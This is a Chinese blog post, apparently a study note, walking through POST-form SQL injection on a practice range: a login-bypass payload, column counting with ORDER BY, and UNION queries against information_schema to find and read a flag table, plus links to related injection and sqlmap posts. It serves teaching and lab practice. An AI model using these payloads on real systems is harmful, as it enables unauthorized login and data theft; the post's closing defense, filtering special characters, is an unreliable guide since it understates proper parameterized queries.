渗透测试基础-POST注入

最新推荐文章于 2024-05-21 08:03:35 发布
最新推荐文章于 2024-05-21 08:03:35 发布
阅读量2.1k 收藏 1
点赞数 2
分类专栏: SQL注入 文章标签: mysql 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45488495/article/details/115521662
版权

渗透测试基础-POST注入

只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力💪!

POST注入是什么

post是一种传参方式,大多出现在各种框处,比如登录框查询框,和各种与数据库有交互的框

注入攻击是:用户输入的数据当作代码执行,这里有两个关键点

  • 关键点一:用户能够控制输入
    关键点二:原本程序要执行的代码,拼接了用户输入的数据

post注入与get注入没有本质的区别,无非就是一个在表单框执行注入,一个在url栏执行注入,没了。

POST注入靶场演练

在这里插入图片描述
进入靶场我们可以看得到,有登录框,属于post传参的方式。在上面,靶场也显示了“数据库查询语句”方便我们查看输入的数据情况。

先用万能密码尝试一下登录测试,看能不能进去。

测试语句:
' or 1=1-- qwe

在这里,我直接用单引号开头,因为在上面有显示了,输入的数据,会放入单引号内,所有先用担引号给他闭合了,后面放入条件为True的语句,让其通过,看看执行情况
在这里插入图片描述
显示登录成功,执行的语句生效了,这里要是真实情况的话,我们就已经登录成功,进入下一个界面了(正式情况下,这样的情况很少出现了😂)。但我们现在是需要找到flag,所以登录成功与否,并没有什么用。所有接下来用order by来继续进行尝试。

测试语句:
'or 1=1 order by 1-- qwe
在这里插入图片描述
现在看起来语句正常执行了,既然order by 1不可以,那就接着测试

在这里插入图片描述
在这里插入图片描述
测试发现这里的字段数为3,那直接用自带库,进行接下来的尝试。

测试语句:
'or 1=1 union select 1,2,table_name from information_schema.tables where table_schema=database() limit 1,1-- qwe

在这里插入图片描述
这里就直接找到了flag表名,拿着这个表名,接着找字段名。

测试语句:
'or 1=1 union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 2,1-- qwe

在这里插入图片描述
limit 2,1的地方找到了flag字段,拿着这个字段名和前面获得的表名,去查询想要的数据。

测试语句:
'or 1=1 union select 1,2,flag from flag limit 1,1-- qwe

在这里插入图片描述
这样就得到了想要的flag

漏洞总结

注入攻击的最后的防护方法就是过滤,过滤特殊符号,如’’,"",(),等

《最好的防御,是明白其怎么实施的攻击》

jinxya
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
mysql post 注入工具_Sqlmap POST注入 三种方法(转载)
weixin_39778582的博客
01-19 996
不管怎么说?使用工具Sqlmap POST注入都会简单很多,具体说说Sqlmap POST注入 三种方法吧!一、自动填写表单自动填写表单是Sqlmap工具POST注入的第一种方法,具体步骤如下:1、判断是否有post注入?root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms出来的提示,一路回车就可以了!结果如下图:从这里,可以得...
渗透测试——万能密码与POST注入
zjdda的博客
05-20 3698
1.万能密码的原理 数据库没有对前端输入的参数的合法性做过率,并且账号和密码 一起输入,可以通过编写恶意语句,将用户与密码的输入结果判断为真,就实现了万能密码的登录。 2.万能密码实例: 查询语句select * from ‘.KaTeX parse error: Double superscript at position 21: …e.' where id=' '̲ and pass=' '; …t_name.’ where id=’ sdadaad’ and pass=’ ‘or’1’=‘1’; 由于
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 4645
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
SQL注入post注入
最新发布
banliyaoguai的博客
05-21 799
GET请求的参数是通过URL传输的,而URL的长度往往被浏览器所限制,通常为2048个字符,因此GET请求的参数传输长度是被限制的。GET请求可以被缓存,因为GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,可以使用缓存来提高性能。POST请求不是幂等的,多次相同的POST请求会对服务器的状态产生影响,可能会改变服务器的数据。GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,不会改变服务器的数据。GET请求通过URL的请求行来提交数据,这些数据在URL中是可见的。
渗透测试之SQL注入POST型的四种注入手法)、SQL注入绕过手段
Hi~ 土拨鼠
12-11 7100
文章目录使用BurpSuite进行post请求的抓包使用联合查询进行注入:使用报错注入进行注入:布尔盲注:时延查询:SQL注入绕过手段大小写字母绕过双写绕过编码绕过内联注释绕过 POST和GET的区别就是注入点位置发生了变化,在浏览器中已经无法直接进行查看与修改。当然可以借助对应的插件可以完成修改任务。 使用BurpSuite进行post请求的抓包 以Sqli-Lab Less11为例。 查看抓的包 将抓到的包发送到repeater模块,就可以进行重复测试了 初步判断sql语句大概为:select un
利用sqlmap进行post注入学习笔记
weixin_52034407的博客
03-19 2942
使用sqlmap进行post注入学习笔记
SQL注入---POST注入
zhoutong2323的博客
04-07 812
在Webshell文章中介绍过post提交和get提交的区别,这里不再赘述get方式提交URL中的参数信息,post方式则是将信息保存在HTTP请求的body中传递get提交的参数可以被缓存并会保留在浏览器的历史记录里,post提交不会。get提交最长2048个字符,而post提交没有长度限制综上所述,post方式提交的数据保密性更强,因此登录界面输入的账号密码信息常用post方式提交。
30-30.渗透测试SQL注入基础(下)、工具和POST类型(上)
05-10
30-30.渗透测试SQL注入基础(下)、工具和POST类型(上)
Metasploit渗透测试指南 修订版
09-21
《Metasploit渗透测试指南 修订版》是一本深度探讨Metasploit框架的权威书籍,旨在帮助初学者和专业人士理解并掌握网络安全领域的渗透测试技术。Metasploit是一款强大的开源安全工具,广泛应用于安全评估、漏洞验证...
sqlmap中文手册-sql注入自动化测试工具
07-19
它可以帮助安全测试人员和渗透测试专家快速识别和利用Web应用程序中的SQL注入弱点,从而获取数据库中的敏感信息,甚至控制底层文件系统和操作系统。该工具是免费开源的,具有广泛的社区支持和持续更新。 SQLMap的...
web渗透测试靶机(新手)
05-07
"626包厢"可能是一个虚拟机或靶场环境的名字,其中包含了多个Web应用程序,用于实践SQL注入、跨站脚本(XSS)、文件包含、命令注入等常见的渗透测试技术。这个环境可以帮助新手了解如何利用这些漏洞,并学习如何防止...
POST、Cookie注入扫描和注入工具
03-11
功能慢全的,注入速度飞快!!! 应该会对注入者有所帮助
web-报错注入-皮卡丘靶场
07-15
【报错注入】是一种安全漏洞,它发生在攻击者能够通过输入特定的数据,导致应用程序返回关于其内部结构或数据库状态的错误信息。...在进行渗透测试安全训练时,皮卡丘靶场提供了一个安全的环境来学习和实践这些概念。
渗透攻击
sinat_25635183的博客
03-23 1145
在这个命令中,"upload" 是一个关键词或者命令,后面的 [options] 表示可选的参数,而 src1、src2、src3 则表示要上传的源文件,destination 表示上传的目标位置。实验前提:攻击者利用被攻击的的漏洞,成功进入到了目标机,即在运行了run/exploit命令之后,就开启了一个reverse TCP监听器来监听本地的4444端口,就是攻击者本地的主机地址(LHOST)和端口号(LPORT)。会话受到了用户权限的限制,而这将会严重影响你在目标系统中的活动。
POST注入
笔墨稠思
11-06 681
靶场地址 POST注入和GET注入几乎没有区别,只是GET注入在url上传参,而POST注入在FORM表单中传递参数。 首先,我们需要判断FORM表单是否存在sql注入: 这是一个登录表单,我采取了通用的登录方式 a’ or 1=1 发现登录成功,说明存在SQL注入 接下来我需要获取当前表的字段数来进行联合查询 用 order by 方法获取了当前表中有3个字段,之后判断回显点 通过联合查询 union select 1,2,3 发现会先点为2,3两字段位置,接下来就可以查询我们想要的内容了 查
【pikachu-SQL】数字型注入post)2022,超详细
weixin_46497491的博客
09-10 1578
【pikachu-SQL】数字型注入post)2022,超详细,web渗透,sql注入渗透测试
利用sqlmap进行POST注入
热门推荐
ChuMeng1999的博客
01-19 1万+
目录预备知识了解SqlmapPOST注入形成的原因实验目的实验环境实验步骤一使用sqlmap进行POST注入实验步骤二 预备知识 了解Sqlmap sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。 POST注入形成的原因 POST注入也属于SQL注入,所以究其原因还是由于参数没有过滤导致的。源码如下
POST登陆框注入
security.blog.cndn.net
03-07 485
1.burpsuite + sqlmap 利用burpsuite抓包保存为txt,利用sqlmap指定文本注入(此方法本人未实战过,是很普遍的方法,详情请自行百度) 注入点:http://www.xx.com/Login.asp sqlmap.py -r test.txt -p Password 2.自动注册表单,截取数据。(直接在后面加[–forms]) sqlmap -u “http://ww...
SQL注入POST型常规注入
Jim的博客
08-14 1万+
less11单引号字符型注入 注入:test' or 1=1 #&password=test sql语句:select username, password from users where username='test' or 1=1 #' and password='test' limit 0,1; 注入:uname=test&passwd=test' or '1'='1 sql语句:
eLearnSecurity eWPT渗透测试笔记概览
eLearnSecurity eWPT Notes提供了一套全面的Web应用安全渗透测试指南,涵盖了从基础知识到高级技术的深入讲解,适合希望在网络安全领域深入学习和实践的人士参考。通过理解和应用这些知识点,学习者可以提升自己的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jinxya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值